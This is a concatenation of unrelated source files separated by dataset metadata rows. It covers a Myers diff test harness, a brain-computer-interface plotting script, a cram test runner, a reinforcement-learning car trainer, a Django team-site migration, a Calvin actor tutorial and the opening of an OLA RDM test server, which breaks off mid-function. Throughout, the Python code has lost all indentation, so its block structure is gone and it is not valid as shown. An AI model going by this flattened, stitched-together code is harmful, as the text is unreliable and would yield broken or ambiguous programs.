used_symbol = False
points = [{"x": i, "y": j}]
while len(points):
new_points = []
for g in range(0, len(points)):
if not (("has_symbol" in s1[points[g]["x"]]) and ("has_symbol" in s2[points[g]["y"]])):
if self.graph[points[g]["y"]][points[g]["x"]]["is_diagonal"]:
if self.assign_symbol(points[g]["x"], points[g]["y"], s1, s2, current_symbol):
used_symbol = True
if self.assign_symbol(points[g]["x"], points[g]["y"], s1, s2, current_symbol):
used_symbol = True
for k in range(0, self.y):
if self.graph[k][points[g]["x"]]["is_diagonal"] and k != points[g]["y"]:
new_points.append({"x": points[g]["x"], "y": k})
for k in range(0, self.x):
if self.graph[points[g]["y"]][k]["is_diagonal"] and k != points[g]["x"]:
new_points.append({"x": k, "y": points[g]["y"]})
points = new_points
if(len(points) > 0):
used_symbol = True
if used_symbol:
current_symbol = current_symbol + 1
return self.solve_sequences(s1, s2, current_symbol)
def add_random_diagonals_to_edit_graph(self):
for i in range(0, self.y):
for j in range(0, self.x):
if random.randint(0,self.diagonal_probability) == 0:
self.graph[i][j] = {"is_diagonal": True}
else:
self.graph[i][j] = {"is_diagonal": False}
def assign_symbol(self, i, j, s1, s2, current_symbol):
made_assignment = False
if "has_symbol" in s1[i]:
if s1[i]["has_symbol"] != current_symbol:
raise
else:
s1[i]["has_symbol"] = current_symbol
made_assignment = True
if "has_symbol" in s2[j]:
if s2[j]["has_symbol"] != current_symbol:
raise
else:
s2[j]["has_symbol"] = current_symbol
made_assignment = True
return made_assignment
def solve_sequences(self, s1, s2, current_symbol):
r1 = []
r2 = []
for i in range(0, len(s1)):
if "has_symbol" in s1[i]:
r1.append(s1[i]["has_symbol"])
else:
r1.append(current_symbol)
current_symbol = current_symbol + 1
for i in range(0, len(s2)):
if "has_symbol" in s2[i]:
r2.append(s2[i]["has_symbol"])
else:
r2.append(current_symbol)
current_symbol = current_symbol + 1
return r1, r2
def make_random_sequences(size):
choice = random.randint(0,2)
if choice == 0:
# Construct an edit graph, and then build a sequences that matches it as closely as possible
eg = EditGraph(random.randint(0, size), random.randint(0, size), random.randint(1, size))
s1, s2 = eg.solve_edit_graph()
return s1, s2
elif choice == 1:
string_a_size = random.randint(0, size)
string_b_size = random.randint(0, size)
s1 = list(''.join(random.choice(generate_alphabet()) for i in range(string_a_size)))
s2 = list(''.join(random.choice(generate_alphabet()) for i in range(string_b_size)))
return s1, s2
else:
special_cases = [
[
# Both empty
[], []
],
[
# Not empty, empty
[1], []
],
[
# Empty, Not empty
[], [1]
],
[
# Not empty, empty
[1,2], []
],
[
# Empty, Not empty
[], [1,2]
],
[
# Both identical
[1,2,3,4], [1,2,3,4]
],
[
# Both different
[1,2,3,4], [5,6,7,8]
],
[
# Half size of the second
[1,2,3,4], [5,6,7,8,'a','b','c','d']
],
[
# Half size of the first
[5,6,7,8,'a','b','c','d'], [1,2,3,4]
],
[
# 2n + 1 size of the second
[5,6,7,8,'a','b','c','d','e'], [1,2,3,4]
],
[
# 2n + 1 size of the first
[1,2,3,4], [5,6,7,8,'a','b','c','d','e']
],
[
# Odd size, odd size
[5,6,7], [1,2,3]
],
[
# Odd size, even size
[5,6,7], [1,2,3,4]
],
[
# Even size, even size
[5,6,7,8], [1,2,3,4]
],
[
# Even size, odd size
[5,6,7,8], [1,2,3]
]
]
case_number = random.randint(0, len(special_cases) -1)
return special_cases[case_number][0], special_cases[case_number][1]
def apply_edit_script(edit_script, s1, s2):
new_sequence = []
i = 0
for e in edit_script:
while e["position_old"] > i:
if i < len(s1):
new_sequence.append(s1[i])
i = i + 1
if e["position_old"] == i:
if e["operation"] == "delete":
i = i + 1
elif e["operation"] == "insert":
new_sequence.append(s2[e["position_new"]])
elif e["operation"] == "change":
new_sequence.append(s2[e["position_new"]])
i = i + 1
else:
# Should not happen
raise
while i < len(s1):
new_sequence.append(s1[i])
i = i + 1
return new_sequence
def get_parts_for_change_region(edit_script, i, ins, dels):
parts = []
# This is the size of the 'changed' region.
square_size = min(len(ins), len(dels))
# These are the inserts and deletes that have been paired up
for n in range(0, square_size):
parts.append({"operation": "change", "position_old": edit_script[dels[n]]["position_old"] ,"position_new": edit_script[ins[n]]["position_new"]})
# These are the leftover inserts, that must be pushed 'square_size' units to the right.
for n in range(square_size, len(ins)):
m = edit_script[ins[n]]
# Adjust the insertion positions so the offsets make sense in the simplified path.
shift_right = square_size - (m["position_old"] - edit_script[i]["position_old"])
p = {"operation": "insert", "position_old": m["position_old"] + shift_right, "position_new": m["position_new"]}
parts.append(p)
# These are the leftover deletes.
for n in range(square_size, len(dels)):
m = edit_script[dels[n]]
parts.append(m)
return parts
def simplify_edit_script(edit_script):
# If we find a contiguous path composed of inserts and deletes, make them into 'changes' so they
# can produce more visually pleasing diffs.
new_edit_script = []
m = len(edit_script)
i = 0
while i < m:
others = []
ins = []
dels = []
last_indx = edit_script[i]["position_old"]
# Follow the path of inserts and deletes
while i + len(ins) + len(dels) < m:
indx = i + len(ins) + len(dels)
edit = edit_script[indx]
if edit["operation"] == "insert" and edit["position_old"] == last_indx:
last_indx = edit["position_old"]
ins.append(indx)
elif edit["operation"] == "delete" and edit["position_old"] == last_indx:
last_indx = edit["position_old"] + 1
dels.append(indx)
else:
if edit["operation"] == "insert" or edit["operation"] == "delete":
pass # Non-contiguous insert or delete.
else: # The current edit is something other than delete or insert, just add it...
others.append(indx)
break
if len(ins) > 0 and len(dels) > 0:
# Do simplify
new_edit_script.extend(get_parts_for_change_region(edit_script, i, ins, dels))
else:
# Add the lone sequence of deletes or inserts
for r in range(0, len(dels)):
new_edit_script.append(edit_script[dels[r]])
for r in range(0, len(ins)):
new_edit_script.append(edit_script[ins[r]])
for r in range(0, len(others)):
new_edit_script.append(edit_script[others[r]])
i += len(ins) + len(dels) + len(others)
return new_edit_script
def compare_sequences(s1, s2):
if len(s1) == len(s2):
for i in range(0, len(s1)):
if s1[i] != s2[i]:
return False
return True
else:
return False
def print_edit_sequence(es, s1, s2):
for e in es:
if e["operation"] == "delete":
print("Delete " + str(s1[e["position_old"]]) + " from s1 at position " + str(e["position_old"]) + " in s1.")
elif e["operation"] == "insert":
print("Insert " + str(s2[e["position_new"]]) + " from s2 before position " + str(e["position_old"]) + " into s1.")
elif e["operation"] == "change":
print("Change " + str(s1[e["position_old"]]) + " from s1 at position " + str(e["position_old"]) + " to be " + str(s2[e["position_new"]]) + " from s2.")
else:
raise
def do_external_diff_test(s1, s2):
echo1 = "echo -en '"+ ("\\\\n".join([str(i) for i in s1])) + "'"
echo2 = "echo -en '"+ ("\\\\n".join([str(i) for i in s2])) + "'"
output1 = os.popen("/bin/bash -c \"../diffutils/original_diff_executable <(" + echo1 + ") <(" + echo2 + ") --minimal\"", 'r').read()
output2 = os.popen("/bin/bash -c \"../diffutils-3.6/src/diff <(" + echo1 + ") <(" + echo2 + ") --minimal\"", 'r').read()
output3 = os.popen("/bin/bash -c \"../original_diff_executable <(" + echo1 + ") <(" + echo2 + ")\"", 'r').read()
output4 = os.popen("/bin/bash -c \"../diffutils-3.6/src/diff <(" + echo1 + ") <(" + echo2 + ")\"", 'r').read()
#print("Echos were " + echo1 + " " + echo2)
if output1 == output2 and output3 == output4:
print("Diff matches.")
else:
print("FAIL! Diff does not match s1=")
assert(0)
def do_test():
s1, s2 = make_random_sequences(random.randint(1,300))
print("Begin test with sequences a=" + str(s1) + " and b=" + str(s2) + "")
# Edit script
minimal_edit_script = diff(s1, s2)
random_edit_script = get_random_edit_script(s1, s2)
reconstructed_minimal_sequence_basic = apply_edit_script(minimal_edit_script, s1, s2)
reconstructed_minimal_sequence_simple = apply_edit_script(simplify_edit_script(minimal_edit_script), s1, s2)
# Random edit scripts encounter cases that the more optimal myers script don't
reconstructed_random_sequence_basic = apply_edit_script(random_edit_script, s1, s2)
reconstructed_random_sequence_simple = apply_edit_script(simplify_edit_script(random_edit_script), s1, s2)
# Pick out only the deletions
only_deletes = [item for item in minimal_edit_script if not item["operation"] == "insert"]
# If we only apply the deletions to the original sequence, this should
# give us the longest common sub-sequence.
reconstructed_lcs_sequence = apply_edit_script(only_deletes, s1, [])
# Longest common subsequence
lcs = longest_common_subsequence(s1, s2)
# Edit script length calculations
optimal_distance = myers_diff_length_original_page_6(s1, s2)
half_memory_distance = myers_diff_length_half_memory(s1, s2)
minab_memory_distance = myers_diff_length_minab_memory(s1, s2)
optimize_y_distance = myers_diff_length_optimize_y_variant(s1, s2)
random_distance = len(random_edit_script)
edit_script_length = len(minimal_edit_script)
# D = (M + N) + L
computed_distance = (len(s1) + len(s2)) - (2 * (len(lcs)))
# Snake finding algorithms
D1, x1, y1, u1, v1 = find_middle_snake_less_memory(s1, len(s1), s2, len(s2))
D2, x2, y2, u2, v2 = find_middle_snake_myers_original(s1, len(s1), s2, len(s2))
#do_external_diff_test(s1, s2)
if not (
D1 == D2 and
x1 == x2 and
y1 == y2 and
u1 == u2 and
v1 == v2 and
reconstructed_lcs_sequence == lcs and
optimal_distance == edit_script_length and
optimal_distance == computed_distance and
optimal_distance == half_memory_distance and
optimal_distance == minab_memory_distance and
optimal_distance == optimize_y_distance and
random_distance >= optimal_distance and
compare_sequences(reconstructed_minimal_sequence_basic, s2) and
compare_sequences(reconstructed_minimal_sequence_simple, s2) and
compare_sequences(reconstructed_random_sequence_basic, s2) and
compare_sequences(reconstructed_random_sequence_simple, s2)
):
print("FAILURE!!!!")
print("Sequences are a=" + str(s1) + " and b=" + str(s2) + "")
print("optimal D: " + str(optimal_distance))
print("computed D: " + str(computed_distance))
print("half memory D: " + str(half_memory_distance))
print("min A,B memory D: " + str(minab_memory_distance))
print("Optimize y D: " + str(optimize_y_distance))
print("random D: " + str(random_distance))
print("reconstructed_minimal_sequence_basic: " + str(reconstructed_minimal_sequence_basic))
print("reconstructed_minimal_sequence_simple: " + str(reconstructed_minimal_sequence_simple))
print("reconstructed_random_sequence_basic: " + str(reconstructed_random_sequence_basic))
print("reconstructed_random_sequence_simple: " + str(reconstructed_random_sequence_simple))
print("edit_script_length: " + str(edit_script_length))
print("Less memory Snake: D=" + str(D1) + " x1=" + str(x1) + " y1=" + str(y1) + " u1=" + str(u1) + " v1=" + str(v1))
print("Myers original Snake: D=" + str(D2) + " x2=" + str(x2) + " y2=" + str(y2) + " u2=" + str(u2) + " v2=" + str(v2))
sys.stdout.flush()
assert(0)
else:
print("Pass")
#random.seed(123) # For deterministic test result comparisons.
i = 0
while True:
do_test()
i=i+1
| apache-2.0 | 4,795,845,030,016,554,000 | 43.878099 | 163 | 0.560103 | false |
lol/BCI-BO-old | plot_iii3b_old.py | 1 | 4787 | import numpy as np
import matplotlib.pyplot as plt
import math
from pylab import figure
from my_plotter import *
import os
import sys
sys.path.append('./BCI_Framework')
import Main
import Single_Job_runner as SJR
import os
import re
if __name__ == '__main__':
bciciv1 = Main.Main('BCI_Framework','BCICIII3b','RANDOM_FOREST', 'BP', 'ALL', -1, 'python')
res_path = bciciv1.config.configuration['results_opt_path_str']
classifiers_dict = {'Boosting':0, 'LogisticRegression':1, 'RANDOM_FOREST':2,'SVM':3, 'LDA':4, 'QDA':5 , 'MLP':6}
features_dict = {'BP':0, 'logbp':1, 'wackerman':2, 'morlet':3, 'AR':4}
results = np.zeros((len(classifiers_dict),len(features_dict), bciciv1.config.configuration["number_of_subjects"]))
discarded_periods = np.empty((len(classifiers_dict),len(features_dict), bciciv1.config.configuration["number_of_subjects"]), dtype='S10')
subjects_dict = {}
for ind, subj in enumerate(bciciv1.config.configuration["subject_names_str"]):
subjects_dict.update({subj:ind})
for dirname, dirnames, filenames in os.walk(res_path):
# for subdirname in dirnames:
# fold_name = os.path.join(dirname, subdirname)
# print fold_name
for filename in filenames:
# slash_indices = re.search('0', filename)
if filename[-4:] != '.pkl':
file_name = os.path.join(dirname, filename)
backslash_indices = [m.start() for m in re.finditer("\\\\", file_name)]
underline_indices = [m.start() for m in re.finditer("_", file_name)]
feature_ext_name = file_name[backslash_indices[-2]+1:backslash_indices[-1]]
classifier_name = file_name[backslash_indices[-3]+1:backslash_indices[-2]]
subj = file_name[underline_indices[-1]+1:-4]
# print feature_ext_name, classifier_name, subj
npzfile = np.load(file_name)
error = npzfile['error']
accuracy = 100 - error*100
results[classifiers_dict[classifier_name], features_dict[feature_ext_name],subjects_dict[subj]] = accuracy
discarded_periods[classifiers_dict[classifier_name], features_dict[feature_ext_name],subjects_dict[subj]] = file_name[backslash_indices[-1]+1:underline_indices[2]]
# with open(file_name,'r') as my_file:
#
# error = float(my_file.readline())
# accuracy = 100 - error*100
# results[classifiers_dict[classifier_name], features_dict[feature_ext_name],subjects_dict[subj]] = accuracy
## print file_name[backslash_indices[-1]+1:underline_indices[1]]
# discarded_periods[classifiers_dict[classifier_name], features_dict[feature_ext_name],subjects_dict[subj]] = file_name[backslash_indices[-1]+1:underline_indices[2]]
#
# print backslash_indices
for feature in features_dict.keys():
f_ind = features_dict[feature]
feature_ext_y = []
labels = []
for subject in subjects_dict.keys():
subj_ind = subjects_dict[subject]
feature_ext_y.append(tuple(results[:,f_ind,subj_ind]))
labels.append(feature + '_' + subject)
# plotter( feature_ext_y, math.floor(np.min(feature_ext_y) - 1), math.floor(np.max(feature_ext_y) + 1), feature, labels)
plotter( feature_ext_y, 46, 97, feature, labels)
for subject in subjects_dict.keys():
for feature in features_dict.keys():
print subject, feature, discarded_periods[:, features_dict[feature],subjects_dict[subject]]
# BP_y = [(72.96,78.62,78.62,76.11,79.25,79.88), (64.45,65.38,65.75,65.00,67.04,66.67), (69.45,71.86,74.26,72.04,69.75,72.6)]
# labels = ['BP_O3','BP_S4','BP_X11']
# plotter( BP_y, 64, 81, 'BP', labels)
# logBP_y = [(74.22,79.25,79.25,77.36,81.77,81.77), (62.23,66.49,66.30,65.38,66.86,66.86), (69.82,72.97,73.15,71.86,74.63,74.63)]
# labels = ['LOGBP_O3','LOGBP_S4','LOGBP_X11']
# plotter( logBP_y, 61, 84, 'logBP', labels)
# wackermann_y = [(56.61,57.24,58.24,54.72,54.72,59.75), (57.97,57.6,59.82,55.75,57.97,58.71), (60,50,57.24,61.49,60.56,62.23)]
# labels = ['wackerman_O3','wackerman_S4','wackerman_X11']
# plotter( wackermann_y, 49, 65, 'wackerman', labels)
# y_RF = [(77.98,76.72,76.72,79.87), (70.74,74.44,80.92,75.18),(75.92,73.51,77.03,78.33),(76.11,77.36,58.5, 54.72), (65,65.38,53.34,55.75), (72.04,71.86,60,61.49)]
# labels = ['BO_RF_O3','BO_RF_S4','BO_RF_X11','RF_grid_search_O3','RF_grid_search_S4','RF_grid_search_X11']
# BO_plotter( y_RF, 49, 83, 'BO_RF', labels)
plt.show() | gpl-3.0 | -2,834,472,925,079,466,500 | 46.88 | 180 | 0.597034 | false |
mpkocher/CramUnit | bin/run_cram_unit.py | 1 | 2616 | #!/usr/bin/env python
import os
import sys
import argparse
import logging
import time
import warnings
import glob
import cram_unit
import cram_unit.crammer as crammer
__version__ = cram_unit.get_version()
log = logging.getLogger()
def _setup_log(level=logging.DEBUG):
handler = logging.StreamHandler(sys.stdout)
str_formatter = '[%(levelname)s] %(asctime)-15s [%(name)s %(funcName)s %(lineno)d] %(message)s'
formatter = logging.Formatter(str_formatter)
handler.setFormatter(formatter)
handler.setLevel(level)
log.addHandler(handler)
log.setLevel(logging.DEBUG)
def _get_parser():
"""Return an instance of ArgumentParser"""
p = argparse.ArgumentParser(version=__version__)
p.add_argument('cram_tests_dir', help="Cram test directory to run.")
p.add_argument("--debug", action="store_true",
help='Turn on debug mode and log to stdout.')
p.add_argument('-x', "--xunit-file", dest='xunit_file', default="cram_xunit.xml",
help="Name of file to write Xunit.xml output to.")
p.add_argument("--cram_prefix", default=None,
help="Prefix that will be added to the test case name. \
(e.g., test_{PREFIX}_{CRAM_FILE})")
p.add_argument("--verbose", action='store_true',
help="pass verbose option to cram")
return p
def main():
"""Main Point of Entry"""
p = _get_parser()
args = p.parse_args()
xunit_file = args.xunit_file
debug = args.debug
cram_tests_dir = args.cram_tests_dir
cram_prefix = args.cram_prefix
if not os.path.exists(cram_tests_dir):
msg = "Unable to Find directory {c}".format(c=cram_tests_dir)
sys.stderr.write(msg + "\n")
return -1
if debug:
_setup_log(logging.DEBUG)
# Hacky kinda of interface now. Just grab all the *.t files from the dir.
cram_files = [os.path.abspath(f) for f in glob.glob("{d}/*.t".format(d=cram_tests_dir))]
if not cram_files:
msg = "Unable to find any *.t files in {x}".format(x=cram_tests_dir)
warnings.warn(msg + "\n")
return 0
#print cram_files
log.info("Found {n} cram files to test {c}".format(n=len(cram_files), c=cram_files))
started_at = time.time()
state = crammer.run(cram_files, xunit_file, prefix=cram_prefix, debug=debug)
run_time = time.time() - started_at
rcode = 0 if state else -1
log.info("Exiting {f} with rcode {r} in {s:.2f} sec.".format(f=os.path.basename(__file__), r=rcode, s=run_time))
return rcode
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | -6,355,580,280,019,088,000 | 27.747253 | 116 | 0.624235 | false |
coreknowledge2016/multi-agent-hrl | learning.py | 1 | 7187 | #from flat_game import carmunk
import carmunk
import numpy as np
import random
import csv
from nn import neural_net, LossHistory
import os.path
import timeit
NUM_INPUT = 6
GAMMA = 0.9 # Forgetting.
TUNING = False # If False, just use arbitrary, pre-selected params.
def train_net(model, params):
filename = params_to_filename(params)
observe = 1000 # Number of frames to observe before training.
epsilon = 1
train_frames = 1000000 # Number of frames to play.
batchSize = params['batchSize']
buffer = params['buffer']
# Just stuff used below.
max_car_distance = 0
car_distance = 0
t = 0
data_collect = []
replay = [] # stores tuples of (S, A, R, S').
loss_log = []
# Create a new game instance.
game_state = carmunk.GameState()
# Get initial state by doing nothing and getting the state.
_, state = game_state.frame_step(2,2)
# Let's time it.
start_time = timeit.default_timer()
# Run the frames.
while t < train_frames:
t += 1
car_distance += 1
# Choose an action.
if random.random() < epsilon or t < observe:
action = np.random.randint(0, 3) # random
action2 = np.random.randint(0, 3)
else:
# Get Q values for each action.
state = state.reshape(1,NUM_INPUT) # reshape
qval = model.predict(state, batch_size=1)
action = (np.argmax(qval)) # best
# Take action, observe new state and get our treat.
reward, new_state = game_state.frame_step(action, action2)
# Experience replay storage.
replay.append((state, action, action2, reward, new_state))
# If we're done observing, start training.
if t > observe:
# If we've stored enough in our buffer, pop the oldest.
if len(replay) > buffer:
replay.pop(0)
# Randomly sample our experience replay memory
minibatch = random.sample(replay, batchSize)
# Get training values.
X_train, y_train = process_minibatch(minibatch, model)
# Train the model on this batch.
history = LossHistory()
model.fit(
X_train, y_train, batch_size=batchSize,
nb_epoch=1, verbose=0, callbacks=[history]
)
loss_log.append(history.losses)
# Update the starting state with S'.
state = new_state
# Decrement epsilon over time.
if epsilon > 0.1 and t > observe:
epsilon -= (1/train_frames)
# We died, so update stuff.
if reward == -500:
# Log the car's distance at this T.
data_collect.append([t, car_distance])
# Update max.
if car_distance > max_car_distance:
max_car_distance = car_distance
# Time it.
tot_time = timeit.default_timer() - start_time
fps = car_distance / tot_time
# Output some stuff so we can watch.
print("Max: %d at %d\tepsilon %f\t(%d)\t%f fps" %
(max_car_distance, t, epsilon, car_distance, fps))
# Reset.
car_distance = 0
start_time = timeit.default_timer()
# Save the model every 25,000 frames.
if t % 25000 == 0:
model.save_weights('saved-models/' + filename + '-' +
str(t) + '.h5',
overwrite=True)
print("Saving model %s - %d" % (filename, t))
# Log results after we're done all frames.
log_results(filename, data_collect, loss_log)
def log_results(filename, data_collect, loss_log):
# Save the results to a file so we can graph it later.
with open('results/sonar-frames/learn_data-' + filename + '.csv', 'w') as data_dump:
wr = csv.writer(data_dump)
wr.writerows(data_collect)
with open('results/sonar-frames/loss_data-' + filename + '.csv', 'w') as lf:
wr = csv.writer(lf)
for loss_item in loss_log:
wr.writerow(loss_item)
def process_minibatch(minibatch, model):
"""This does the heavy lifting, aka, the training. It's super jacked."""
X_train = []
y_train = []
# Loop through our batch and create arrays for X and y
# so that we can fit our model at every step.
for memory in minibatch:
# Get stored values.
old_state_m, action_m, action2_m, reward_m, new_state_m = memory
old_state_m = old_state_m.reshape(1,NUM_INPUT)
new_state_m = new_state_m.reshape(1,NUM_INPUT)
#print old_state_m,new_state_m
# Get prediction on old state.
old_qval = model.predict(old_state_m, batch_size=1)
# Get prediction on new state.
newQ = model.predict(new_state_m, batch_size=1)
# Get our best move. I think?
maxQ = np.max(newQ)
y = np.zeros((1, 3))
y[:] = old_qval[:]
# Check for terminal state.
if reward_m != -500: # non-terminal state
update = (reward_m + (GAMMA * maxQ))
else: # terminal state
update = reward_m
# Update the value for the action we took.
y[0][action_m] = update
X_train.append(old_state_m.reshape(NUM_INPUT,))
y_train.append(y.reshape(3,))
X_train = np.array(X_train)
y_train = np.array(y_train)
return X_train, y_train
def params_to_filename(params):
return str(params['nn'][0]) + '-' + str(params['nn'][1]) + '-' + \
str(params['batchSize']) + '-' + str(params['buffer'])
def launch_learn(params):
filename = params_to_filename(params)
print("Trying %s" % filename)
# Make sure we haven't run this one.
if not os.path.isfile('results/sonar-frames/loss_data-' + filename + '.csv'):
# Create file so we don't double test when we run multiple
# instances of the script at the same time.
open('results/sonar-frames/loss_data-' + filename + '.csv', 'a').close()
print("Starting test.")
# Train.
model = neural_net(NUM_INPUT, params['nn'])
train_net(model, params)
else:
print("Already tested.")
if __name__ == "__main__":
if TUNING:
param_list = []
nn_params = [[164, 150], [256, 256],
[512, 512], [1000, 1000]]
batchSizes = [40, 100, 400]
buffers = [10000, 50000]
for nn_param in nn_params:
for batchSize in batchSizes:
for buffer in buffers:
params = {
"batchSize": batchSize,
"buffer": buffer,
"nn": nn_param
}
param_list.append(params)
for param_set in param_list:
launch_learn(param_set)
else:
nn_param = [164, 150]
params = {
"batchSize": 100,
"buffer": 200,
"nn": nn_param
}
model = neural_net(NUM_INPUT, nn_param)
train_net(model, params)
# keras.callbacks.TensorBoard(log_dir='./logs', histogram_freq=0)
| mit | 8,669,900,673,622,070,000 | 30.384279 | 88 | 0.554056 | false |
murych/lambdaweb | team/migrations/0001_initial.py | 1 | 6857 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-09 17:59
from __future__ import unicode_literals
import ckeditor_uploader.fields
import colorfield.fields
import django.db.models.deletion
import filebrowser.fields
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0008_alter_user_username_max_length'),
]
operations = [
migrations.CreateModel(
name='Member',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=254, unique=True)),
('git_username', models.CharField(max_length=300, verbose_name='Git username')),
('is_active', models.BooleanField(default=True)),
('is_admin', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True,
help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.',
related_name='user_set', related_query_name='user', to='auth.Group',
verbose_name='Группа')),
('date_of_birth', models.DateField(blank=True, null=True, verbose_name='Дата рождения')),
('first_name', models.CharField(blank=True, max_length=300, null=True, verbose_name='Имя')),
('last_name', models.CharField(blank=True, max_length=300, null=True, verbose_name='Фамилия')),
('profile_image', filebrowser.fields.FileBrowseField(blank=True, max_length=200, null=True,
verbose_name='Изображения профиля')),
],
options={
'abstract': False,
'verbose_name': 'Участника',
'verbose_name_plural': 'Участники'
},
),
migrations.CreateModel(
name='SocialNetwork',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(
choices=[('mdi-github-circle', 'GitHub'), ('mdi-twitter', 'Twitter'), ('mdi-gmail', 'Mail'),
('mdi-vk', 'Vk'), ('mdi-facebook', 'Facebook')], max_length=300,
verbose_name='Название социальной сети')),
('link', models.CharField(max_length=300, verbose_name='Ссылка на профиль')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'социальных сетей',
'verbose_name_plural': 'социальных сетей'
}
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=300, verbose_name='Название')),
('description', ckeditor_uploader.fields.RichTextUploadingField(verbose_name='Описание')),
('members', models.ManyToManyField(to=settings.AUTH_USER_MODEL, verbose_name='Участники проекта')),
('git', models.URLField(blank=True, null=True, verbose_name='Cсылка на Git')),
('image', filebrowser.fields.FileBrowseField(blank=True, max_length=200, null=True,
verbose_name='Главное изображение')),
],
options={
'verbose_name': 'Проект',
'verbose_name_plural': 'Проекты'
}
),
migrations.CreateModel(
name='Partner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=300, verbose_name='Название партнера')),
('type_partner', models.CharField(
choices=[('info', 'Информационный'), ('finance', 'Финансовый'), ('general', 'Генеральный')],
max_length=300, verbose_name='Тип партнера')),
('description', ckeditor_uploader.fields.RichTextUploadingField(verbose_name='Описание')),
('address', models.CharField(blank=True, max_length=500, null=True, verbose_name='Адрес')),
('site', models.CharField(max_length=500, verbose_name='Сайт')),
('phone', models.CharField(blank=True, max_length=500, null=True, verbose_name='Телефон')),
('image', filebrowser.fields.FileBrowseField(blank=True, max_length=200, null=True,
verbose_name='Изображение')),
('slug', models.SlugField()),
],
options={
'verbose_name': 'Партнер',
'verbose_name_plural': 'Партнеры',
},
),
migrations.CreateModel(
name='SEO',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('seo_description', models.TextField(verbose_name='SEO Описание')),
('key_words', models.TextField(verbose_name='Ключ слова')),
],
options={
'verbose_name': 'SEO',
'verbose_name_plural': 'SEO',
},
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=300, verbose_name='Название')),
('color', colorfield.fields.ColorField(default='#FF0000', max_length=10)),
],
options={
'verbose_name': 'Тэг',
'verbose_name_plural': 'Тэги',
},
),
]
| mit | 8,095,969,056,012,038,000 | 49.48062 | 160 | 0.534091 | false |
MalmoUniversity-DA366A/calvin-base | calvin/tutorial/dist-1.py | 1 | 1306 | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from calvin.utilities.nodecontrol import dispatch_node
from calvin.utilities import utils
import time
# create one node
node_1 = dispatch_node(uri="calvinip://localhost:5000", control_uri="http://localhost:5001",
attributes=["node/affiliation/owner/me", "node/affiliation/name/node-1"])
# send 'new actor' command to node
counter_id = utils.new_actor(node_1, 'std.Counter', 'counter')
# send 'new actor' command to node
output_id = utils.new_actor(node_1, 'io.StandardOut', 'output')
# send 'connect' command to node
utils.connect(node_1, output_id, 'token', node_1.id, counter_id, 'integer')
# runt app for 3 seconds
time.sleep(3)
# send quite to node
utils.quit(node_1)
| apache-2.0 | 3,418,883,178,260,327,400 | 33.368421 | 96 | 0.725881 | false |
mlba-team/open-lighting | tools/rdm/rdm_test_server.py | 1 | 30914 | #!/usr/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# rdm_test_server.py
# Copyright (C) 2012 Ravindra Nath Kakarla & Simon Newton
import cgi
import json
import logging
import mimetypes
import os
import pprint
import re
import signal
import stat
import sys
import textwrap
import threading
import traceback
import urlparse
from datetime import datetime
from optparse import OptionParser, OptionGroup, OptionValueError
from threading import Condition, Event, Lock, Thread
from time import time, sleep
from wsgiref.simple_server import make_server
from ola.UID import UID
from ola.ClientWrapper import ClientWrapper, SelectServer
from ola.OlaClient import OlaClient, OLADNotRunningException
from ola import PidStore
from ola.testing.rdm.DMXSender import DMXSender
from ola.testing.rdm import DataLocation
from ola.testing.rdm import ResponderTest
from ola.testing.rdm import TestDefinitions
from ola.testing.rdm import TestLogger
from ola.testing.rdm import TestRunner
from ola.testing.rdm.ModelCollector import ModelCollector
from ola.testing.rdm.TestCategory import TestCategory
from ola.testing.rdm.TestState import TestState
__author__ = '[email protected] (Ravindra Nath Kakarla)'
settings = {
'PORT': 9099,
}
class Error(Exception):
"""Base exception class."""
class ServerException(Error):
"""Indicates a problem handling the request."""
class OLAThread(Thread):
"""The thread which runs the OLA Client."""
def __init__(self, ola_client):
super(OLAThread, self).__init__()
self._client = ola_client
self._ss = None # created in run()
def run(self):
self._ss = SelectServer()
self._ss.AddReadDescriptor(self._client.GetSocket(),
self._client.SocketReady)
self._ss.Run()
logging.info('OLA thread finished')
def Stop(self):
if self._ss is None:
logging.critical('OLAThread.Stop() called before thread was running')
return
logging.info('Stopping OLA thread')
self._ss.Terminate()
def Execute(self, cb):
self._ss.Execute(cb)
def FetchUniverses(self):
return self.MakeSyncClientCall(self._client.FetchUniverses)
def FetchUIDList(self, *args):
return self.MakeSyncClientCall(self._client.FetchUIDList, *args)
def RunRDMDiscovery(self, *args):
